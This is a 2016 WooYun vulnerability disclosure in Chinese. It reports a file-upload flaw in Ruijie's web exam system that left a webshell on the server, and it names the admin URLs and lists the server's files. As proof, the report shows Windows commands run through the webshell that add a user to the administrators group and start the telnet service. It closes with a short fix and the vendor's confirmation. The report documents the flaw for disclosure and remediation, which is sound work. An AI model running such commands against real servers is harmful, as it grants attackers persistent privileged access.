漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0166810
漏洞标题:锐捷官方站点某系统逻辑漏洞导致服务器配置文件错误导致getshell可执行命令【威胁内网】
相关厂商:ruijie.com.cn
漏洞作者: 雷
提交时间:2016-01-02 18:52
修复时间:2016-02-12 18:49
公开时间:2016-02-12 18:49
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-02: 细节已通知厂商并且等待厂商处理中
2016-01-04: 厂商已经确认,细节仅向厂商公开
2016-01-14: 细节向核心白帽子及相关领域专家公开
2016-01-24: 细节向普通白帽子公开
2016-02-03: 细节向实习白帽子公开
2016-02-12: 细节向公众公开
简要描述:
锐界高数据大平台
详细说明:
起初 发现一枚webshell
利用逆向思维
发现是上传导致漏洞
漏洞证明:
可以执行命令
请看
E:\jiefo\WebExam\Admin\TKSystem\upload>net localgroup administrators ruijie /add
============================================================================================================r
E:\jiefo\WebExam\Admin\TKSystem\upload>net user
============================================================================================================r
\\ ���û��ʻ�
-------------------------------------------------------------------------------
administrator Guest tringftp
zph
����������ϣ�������һ����������
E:\jiefo\WebExam\Admin\TKSystem\upload>net start telnet
============================================================================================================r
E:\jiefo\WebExam\Admin\TKSystem\upload>net user
============================================================================================================r
\\ ���û��ʻ�
-------------------------------------------------------------------------------
administrator Guest tringftp
zph
����������ϣ�������һ����������
E:\jiefo\WebExam\Admin\TKSystem\upload>
自觉删除webshell
利用逆向思维
发现是上传导致漏洞
http://wdexam.ruijie.com.cn/webexam/admin/
是一个考试系统的
http://wdexam.ruijie.com.cn/WebExam/login.aspx?ReturnUrl=%2fwebexam%2fadmin%2fDefault.aspx
没什么用 接着看
找到这么多文件
2013年3月20日 10:04 2410 AnalyseByMonth.aspx
2013年2月22日 10:20 3944 AnalyseByOrgan.aspx
2013年2月21日 12:41 2022 AnalyseByUserInfo.aspx
2013年2月22日 10:21 1980 AnalyseByWeek.aspx
2013年2月22日 10:20 2467 AnalyseByYear.aspx
2013年3月19日 9:33 541 AnalyseExport.aspx
2013年10月9日 9:26 4085 AnalyseLectuer.aspx
2013年5月25日 12:35 1951 AnalyseList.aspx
2013年5月25日 12:35 11929 AnalyseManage_Query.aspx
2013年3月20日 9:43 6452 AnalyseRequied.aspx
2013年5月25日 12:35 6951 AnalyseStudyClassReady.aspx
2013年5月25日 12:35 5123 AvgExamPassRate.aspx
2013年5月25日 12:35 3694 AvgStudyCourse.aspx
2013年5月25日 12:35 6699 AvgStudyTimeYear.aspx
2013年3月19日 14:17 3355 BadCourse.aspx
2013年3月19日 14:17 3355 BestCourse.aspx
2013年3月19日 14:22 3348 ColdCourse.aspx
2013年3月20日 10:41 4534 CourseUpdateRate.aspx
2013年5月25日 12:35 15851 ExamCJD.aspx
2013年3月20日 10:00 5316 ExamManageQuery.aspx
2013年2月22日 10:33 560 ExcelExport.aspx
2013年2月21日 11:30 570 ExcelExport2.aspx
2013年2月25日 18:21 570 ExcelExport3.aspx
2014年2月24日 14:37 9677 ExerciseReport.aspx
2013年3月19日 14:22 3346 HotCourse.aspx
2013年3月20日 9:56 4892 Investigate.aspx
2013年2月26日 15:28 580 InvestigateExport.aspx
2013年2月26日 15:31 6252 InvestigateResult.aspx
2013年5月25日 12:35 8113 LogManage.aspx
2013年3月20日 9:53 6472 OrganCourseStat.aspx
2013年12月11日 17:38 3344 OrganEachCourseLearnStat.aspx
2013年12月11日 17:38 1860 OrganEachCourseOrganStat.aspx
2013年12月11日 17:38 7213 OrganEachCourseStat.aspx
2013年5月25日 12:35 3377 OrganVisitStat.aspx
2013年12月11日 17:38 20313 PersonLearningRecord.aspx
2013年3月5日 9:27 4471 StudyClassQuery.aspx
2013年2月27日 15:32 590 StudyClassQueryExport.aspx
2013年5月25日 12:35 6694 StudyTimeYear.aspx
2013年5月25日 12:35 5212 TrainAvgStudyTime.aspx
2013年5月25日 12:35 5181 TrainSumStudyTime.aspx
2015年11月2日 9:38 <dir> XLSTemp
iis apppool\webexampool
修复方案:
删除webshell
增加验证
版权声明:转载请注明来源 雷@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2016-01-04 08:02
厂商回复:
正在修复
最新状态:
暂无